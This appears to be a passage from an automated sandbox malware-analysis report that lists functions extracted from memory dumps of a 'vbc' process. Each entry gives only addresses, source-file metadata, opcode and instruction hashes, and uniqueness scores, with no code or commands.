                                                                                                    Function 0054D7C8 Relevance: .0, Instructions: 29COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fd4fa757602368472c3bb6c6a3637f1309b95a82d2d8b01730915f15e9d58f2e
                                                                                                    • Instruction ID: d9d3585eb278e1e2988b76d263f293ff36bda80a38fbfd7190cd7f6ad3ee68bf
                                                                                                    • Opcode Fuzzy Hash: fd4fa757602368472c3bb6c6a3637f1309b95a82d2d8b01730915f15e9d58f2e
                                                                                                    • Instruction Fuzzy Hash: E5F0A7327043054BC7148B25E894D5ABF56DFE4218709CD3E954A97261DB749C098B90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00545EC0 Relevance: .0, Instructions: 29COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d560569a8d64b9eb227c0354772617c025578d68a72b152f8d0cc47865c083ba
                                                                                                    • Instruction ID: aba12ed2322e0e664e5530980fcd1805a6d498f85c0bd56d8661fd6d1badfbb9
                                                                                                    • Opcode Fuzzy Hash: d560569a8d64b9eb227c0354772617c025578d68a72b152f8d0cc47865c083ba
                                                                                                    • Instruction Fuzzy Hash: E2F08272908658AFCB29CFA4E4487CD7FB6EF85314F0980E9D045972A1E7B01A89CB81
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484CEDF Relevance: .0, Instructions: 28COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ab31aa5006f231e26d12612d085802a1f53bc64f9359955b7abea7da5084fc5d
                                                                                                    • Instruction ID: f0dbd09a3aa4c132fc61ec419ded1a08f9ef6b5baced553eb8d64d23f85e2afa
                                                                                                    • Opcode Fuzzy Hash: ab31aa5006f231e26d12612d085802a1f53bc64f9359955b7abea7da5084fc5d
                                                                                                    • Instruction Fuzzy Hash: 92F0C96229E3C05FD34396245CA22C63F708E6761475A85DBC984CF1A3D5199C0F8726
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F9A68 Relevance: .0, Instructions: 27COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2a6fd732db2066670f3b596e2be0591e80cc42567023687c961f6b58175e65a1
                                                                                                    • Instruction ID: 0bf55ec018a248ce46cb6dc3ba35f4a15100d4317ef4e3ad86e733cefe61d95b
                                                                                                    • Opcode Fuzzy Hash: 2a6fd732db2066670f3b596e2be0591e80cc42567023687c961f6b58175e65a1
                                                                                                    • Instruction Fuzzy Hash: 81E0D872E0D1DDCB47159BA598101B9FB51AAD1310338429BD32647144DB1A4D07A28F
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F9525 Relevance: .0, Instructions: 27COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d79f4b5e34f35ed67c5c7342859a92214c500c2c596ffa0227502e4ff12ee073
                                                                                                    • Instruction ID: cedcef7871e667ea769a63e616068e0431e42f172ab52e26b24da05831bacd6e
                                                                                                    • Opcode Fuzzy Hash: d79f4b5e34f35ed67c5c7342859a92214c500c2c596ffa0227502e4ff12ee073
                                                                                                    • Instruction Fuzzy Hash: F6E0C29214E2D49FC713976588285A9BF309F47310B9C80CBE5898B4A3E6554906C325
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005241FA Relevance: .0, Instructions: 27COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b8fa4d6bcd4a21563c98653715ccc030bf765e6fb03f55af58e83d14b1f0c439
                                                                                                    • Instruction ID: 5ff9bf304e08aa55d521883bb7876caf3956145a8c5e3295e70bbb116c6a1b29
                                                                                                    • Opcode Fuzzy Hash: b8fa4d6bcd4a21563c98653715ccc030bf765e6fb03f55af58e83d14b1f0c439
                                                                                                    • Instruction Fuzzy Hash: 55E06D751082896FDB028F90DC50CFA7FBAEF46210708818BFC4486252C676CC27DBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 002622BE Relevance: .0, Instructions: 27COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.603959792.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_260000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bb29afd70b60fd058e8cd475633e003acd0bdf7684ddf5b4b546e42c360b34f8
                                                                                                    • Instruction ID: bc041e4d185a805bd1250f1bdd37e5b288e2522b31ca7a8f900b389a06fd4237
                                                                                                    • Opcode Fuzzy Hash: bb29afd70b60fd058e8cd475633e003acd0bdf7684ddf5b4b546e42c360b34f8
                                                                                                    • Instruction Fuzzy Hash: 10E065303087558FC708BBA4B4745BD3369DB85386B05C13EEA06D7345DF645D058797
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 04361E1C Relevance: .0, Instructions: 27COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608377436.0000000004360000.00000040.00000800.00020000.00000000.sdmp, Offset: 04360000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4360000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1ac43355e319d84f9c33b871f69ce120d284916bbe6658189fdeadafb76515a1
                                                                                                    • Instruction ID: a58c74b313310051ea3df8d5fff32879a7f3bd15b9f498f23ef50947971717db
                                                                                                    • Opcode Fuzzy Hash: 1ac43355e319d84f9c33b871f69ce120d284916bbe6658189fdeadafb76515a1
                                                                                                    • Instruction Fuzzy Hash: 15F05E70E0420A8BDF14DF91C9516EEB7F2AF48700F25E56AD007BB614DF35A9409BA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F60E0 Relevance: .0, Instructions: 26COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: eea3ee8b55377b9c4f5244215cd75bd483b7ee8e7b730dcb828e08e874b7c8bb
                                                                                                    • Instruction ID: 8b15dd053795278335906eb8cb17af55209bfe08aed23ce8333c62d363ea1140
                                                                                                    • Opcode Fuzzy Hash: eea3ee8b55377b9c4f5244215cd75bd483b7ee8e7b730dcb828e08e874b7c8bb
                                                                                                    • Instruction Fuzzy Hash: 89E0863130812CAB861065865A0187A660DD7E1761B32812BB70647243C95A8913B7BF
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F79E0 Relevance: .0, Instructions: 26COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 071718844aa384998e22b3d9e62f6024fdbf44aa79aecd62d24514a86ee3568c
                                                                                                    • Instruction ID: d68100834c53165b4d0f2f3e8912a93ee41abde2c1a3370bec2291fff4899e31
                                                                                                    • Opcode Fuzzy Hash: 071718844aa384998e22b3d9e62f6024fdbf44aa79aecd62d24514a86ee3568c
                                                                                                    • Instruction Fuzzy Hash: B7E065311186986FC702CAA49C208BA7FB8DE86210709818FE8C5C62A2C162A925DB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00545ED0 Relevance: .0, Instructions: 26COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 12221e58d4d356f710e67097aca6183754011abe3adb35f9eedbdcf29ce55be6
                                                                                                    • Instruction ID: 77edaeb938aa88eba09b2dd57b6bac1b5a46144242cd61602026bcd5064807e0
                                                                                                    • Opcode Fuzzy Hash: 12221e58d4d356f710e67097aca6183754011abe3adb35f9eedbdcf29ce55be6
                                                                                                    • Instruction Fuzzy Hash: 0EF06571A04618AFCB19CF58D4486DDBFFAEB45214F04C095D00593390DB701A85CB84
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 002622C0 Relevance: .0, Instructions: 26COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.603959792.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_260000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 94b41d2bf85ea9ff6473a42e506741212a21cb39e6e9cee1164cbca2971fb96f
                                                                                                    • Instruction ID: 31b3504034f659362d7447b860378e71f724d1e15e0bbdf70793de54ae66f8ea
                                                                                                    • Opcode Fuzzy Hash: 94b41d2bf85ea9ff6473a42e506741212a21cb39e6e9cee1164cbca2971fb96f
                                                                                                    • Instruction Fuzzy Hash: 75E06D303047568B8708BBA8A46416D336EDB8539AB02C03EEA06D7349DF645C05879B
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484DE30 Relevance: .0, Instructions: 26COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 06cb97320ed528afcd10b6a7b80e0307958930830bd35f0326f1aef943565c9f
                                                                                                    • Instruction ID: 1a3595ab6c0f68482200b30f252d2b10265ace5cfb3096a6c8ece3575afab975
                                                                                                    • Opcode Fuzzy Hash: 06cb97320ed528afcd10b6a7b80e0307958930830bd35f0326f1aef943565c9f
                                                                                                    • Instruction Fuzzy Hash: ABF01570E1120CEF9B80EFB8D9854ACBBF4EB84204F1089B9D406E7254EA30AF509B85
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0054D7D8 Relevance: .0, Instructions: 25COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ea2e630180768c663b7aa28d855388ec564dbcaa49d309d464c8334164e48c78
                                                                                                    • Instruction ID: 1e4b4626378d1f19fba6be76fb35915de1b074df9ffdf7343e7b43c3583a9bd8
                                                                                                    • Opcode Fuzzy Hash: ea2e630180768c663b7aa28d855388ec564dbcaa49d309d464c8334164e48c78
                                                                                                    • Instruction Fuzzy Hash: 01E0483130430957C7149B16EC94C4BFB9AEFD0664315CD39954AD7234DF74AC0987D4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052CB8A Relevance: .0, Instructions: 25COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d85b69364edc874563c656bbfefba2710ca75573d15b9639ee7ce5a898e4c646
                                                                                                    • Instruction ID: 8e190d0ff76c41b63e34ec873f92a91fdb0ca4b858ec26a4270befa9d7f7dd9c
                                                                                                    • Opcode Fuzzy Hash: d85b69364edc874563c656bbfefba2710ca75573d15b9639ee7ce5a898e4c646
                                                                                                    • Instruction Fuzzy Hash: D2E0C936505149AFDB068E94DC11CEA7F76EF89260714818AF90586262C7768927DB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00528E8F Relevance: .0, Instructions: 25COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 193acd926d7fac61f44fe7cb58ec0b567230eae960f0b9cc50a95c1643945d0e
                                                                                                    • Instruction ID: b25a2ecc740fbe759c8e8136a614276f0b815555ec8f61d3888f17258d67ce8b
                                                                                                    • Opcode Fuzzy Hash: 193acd926d7fac61f44fe7cb58ec0b567230eae960f0b9cc50a95c1643945d0e
                                                                                                    • Instruction Fuzzy Hash: 1AE0867084A1446FC701CBA44C558DFBFF9EE4230071143DBE445C7152DA390A075B61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F5421 Relevance: .0, Instructions: 24COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9c30281f2451da0f0ffb31add23e1aede8829271109aef19b47fe0a82c2d6163
                                                                                                    • Instruction ID: df97b601e386353f0d90219c69569bec6385cb76467a8846287b58f9d069223e
                                                                                                    • Opcode Fuzzy Hash: 9c30281f2451da0f0ffb31add23e1aede8829271109aef19b47fe0a82c2d6163
                                                                                                    • Instruction Fuzzy Hash: DBE0923210819C6FCB028F80DC148EA7F32EF4A310B04819BFC0087262C632DD26EB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FB7D8 Relevance: .0, Instructions: 24COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 785b467003c093d2d41c537025ef89127514c7d77da7a0092ce128ffd4a75e77
                                                                                                    • Instruction ID: 352fd20e3507d32f38b8637114f60fb0cabc8605c94f3f531b327aa2094ec59a
                                                                                                    • Opcode Fuzzy Hash: 785b467003c093d2d41c537025ef89127514c7d77da7a0092ce128ffd4a75e77
                                                                                                    • Instruction Fuzzy Hash: 93E04F3121C2DD6FC742CF94DC248BA7FA6EF86210B19859FF884C72A2C6729D11E761
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00543390 Relevance: .0, Instructions: 24COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5cd9526e2f255a6aa952e009eb8a56fd3bb3f40f77f5be575faf5fe69b2ac66d
                                                                                                    • Instruction ID: ea7249f5fde75ab05d9ec72369b6382e08135d1868fc47ffc054497f497e7d45
                                                                                                    • Opcode Fuzzy Hash: 5cd9526e2f255a6aa952e009eb8a56fd3bb3f40f77f5be575faf5fe69b2ac66d
                                                                                                    • Instruction Fuzzy Hash: BBE09274A04248AFDB00CFB09855AEDBBB5EF95300F0185A9D808EB281D6351E049B10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00540B48 Relevance: .0, Instructions: 24COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 028d3d1cb915f61a3c716324619136e0817172093193f9765aea9604daadd3a9
                                                                                                    • Instruction ID: b29dd01899264ee719cc753a0f2b17aeedf947f72d3206f31d854588d170d12a
                                                                                                    • Opcode Fuzzy Hash: 028d3d1cb915f61a3c716324619136e0817172093193f9765aea9604daadd3a9
                                                                                                    • Instruction Fuzzy Hash: 0EE0867598E2C4AFC702CBB44C119DA7FF9AE0230071502DFE884D7563D5284E19A762
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005261B4 Relevance: .0, Instructions: 24COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 04dac51df887f3a478a5dc69d0e0bb2c7c6146f61f269c10981abdca2906183d
                                                                                                    • Instruction ID: 269be4a95d374de8895448630370f16e1dd67146d7d234889048c8d489de6c03
                                                                                                    • Opcode Fuzzy Hash: 04dac51df887f3a478a5dc69d0e0bb2c7c6146f61f269c10981abdca2906183d
                                                                                                    • Instruction Fuzzy Hash: 38E0C236200410EF8B0A5F88E904D69BFA6FB9C31030A8094F3098B276C732C822EB40
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F90E0 Relevance: .0, Instructions: 23COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d87f36d17922a35b6f6b3f2bd66a96ba8ce88ebbb95fde81e6a25be18a1906a6
                                                                                                    • Instruction ID: 9e58a5ce5a2ea425aea048300f92e1efd9b029a3365a37967f36f80b39f9cd6a
                                                                                                    • Opcode Fuzzy Hash: d87f36d17922a35b6f6b3f2bd66a96ba8ce88ebbb95fde81e6a25be18a1906a6
                                                                                                    • Instruction Fuzzy Hash: C2E0863091D18C9FC702CFB44C515DE7BB4EE01200B1242D7D849D7192E6350E069B82
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F1C70 Relevance: .0, Instructions: 23COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6dfa38b4f957c84891a1e9ec94b5ed90a4ace5d56693e3bb22e947b87902122f
                                                                                                    • Instruction ID: 58eec77d47ec9c303407c8973f5cf500d90a4387a105a2b5c478fc7f0449c14b
                                                                                                    • Opcode Fuzzy Hash: 6dfa38b4f957c84891a1e9ec94b5ed90a4ace5d56693e3bb22e947b87902122f
                                                                                                    • Instruction Fuzzy Hash: 39E02632304248BBC32227089808B6A3E29CBD5720F14807AF704CB3D5CA708C0193A6
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00542F40 Relevance: .0, Instructions: 23COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 998f11067022fdf6121df26144a1d5155bbb8988218a161cc820607101cc5624
                                                                                                    • Instruction ID: 4699a0984b7b19642ea0ea7f8305f07704f3e0e809db75b595fd93eb0537315f
                                                                                                    • Opcode Fuzzy Hash: 998f11067022fdf6121df26144a1d5155bbb8988218a161cc820607101cc5624
                                                                                                    • Instruction Fuzzy Hash: 5AE09A75A05248AFCB04CFA0E951BED7BA4EB45304F1145A9D808E7382E6342E04DB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00529468 Relevance: .0, Instructions: 23COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3da4f3e37d43f4caf1ffaffb700023599f7be497805f9ad8fc5ba7dc3777f89b
                                                                                                    • Instruction ID: f9f0393bbaddf88a2fcd2e30677e6ec5fab06f99ea36e24bf802132275afc722
                                                                                                    • Opcode Fuzzy Hash: 3da4f3e37d43f4caf1ffaffb700023599f7be497805f9ad8fc5ba7dc3777f89b
                                                                                                    • Instruction Fuzzy Hash: A8E01A722092946FCB428E54AC108E67F76DBAA2107098087F945C6262D676CD22D7A0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00523CF2 Relevance: .0, Instructions: 23COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2bf01178508844bf6144d1dd15c2f7be91de12bcb7ce1520a257f13af5480fc4
                                                                                                    • Instruction ID: 5bff6cc906c282b8c86fca31a824392d5880147f5401b61a156d8ef4b77999b8
                                                                                                    • Opcode Fuzzy Hash: 2bf01178508844bf6144d1dd15c2f7be91de12bcb7ce1520a257f13af5480fc4
                                                                                                    • Instruction Fuzzy Hash: 46E012311082846FD702CA549C50CE67F75DB46220719818FE85597292C6768C13D751
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F8098 Relevance: .0, Instructions: 22COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d8a9b97186728d203f1edd395543f14c51df4b7fa212e59d76b141960c76d011
                                                                                                    • Instruction ID: 6a0559675e96544d8ec88d62bc31746e84f5f22b68ece37bc4cd7823789587aa
                                                                                                    • Opcode Fuzzy Hash: d8a9b97186728d203f1edd395543f14c51df4b7fa212e59d76b141960c76d011
                                                                                                    • Instruction Fuzzy Hash: 2AE0123510C1956FCB02CF589D50CE67F65DF86254704809BF99586152C5728D32DBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F53E8 Relevance: .0, Instructions: 22COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b98a99d9c2cb58c741e91e5da53ff44ff93e90ea78f889d10ab4d5eb045be787
                                                                                                    • Instruction ID: fcaa654d797829a91cfbeaa35259f44da1ddac85d26a47ad3a89d8470cce242b
                                                                                                    • Opcode Fuzzy Hash: b98a99d9c2cb58c741e91e5da53ff44ff93e90ea78f889d10ab4d5eb045be787
                                                                                                    • Instruction Fuzzy Hash: E4E0867180E28CAFCB02DFB44C114DF7FB5DA0220471542EBC445D7153D9350B189B92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

